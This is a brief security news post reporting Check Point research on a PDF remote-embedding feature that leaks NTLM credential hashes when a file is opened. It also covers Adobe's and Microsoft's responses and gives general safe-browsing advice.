According to Check Point researchers, there is a new attack vector to be aware of. Rather than exploiting the vulnerabilities in Microsoft Word files or Outlook’s handling of RTF files, attackers take advantage of a feature that allows embedding remote documents and files inside a PDF file. The attacker can then use this to inject malicious content into a PDF. When this file is opened, the target automatically leaks credentials in the form of NTLM hashes.
As reported by SecurityWeek, Adobe will not be releasing a fix for this behavior. The company is relying on Windows 10 and Windows Server 2016 updates. With this new feature, clients can reject authentication if the resource requesting authentication has not been set as ‘internal’ on their Windows Firewall (See Microsoft security advisory ADV170014).
The advisory does not cover older versions of MS operating systems. It requires the users (or their IT organization) to take positive steps towards configuring the new behavior.
PDF exploits are not new. They have been with us for a long time. In 2010, malicious PDFs were reported to have made up 80% of all 2009 exploits.
As ever, the advice remains the same:
- Be aware of what you are opening and where it comes from (That goes for clickbait too).
- Make sure your antivirus software is up-to-date and set to ‘on access’.
- Use a web safety tool that will alert you about suspicious links or sites with a bad reputation before opening them.
- If in doubt, don’t!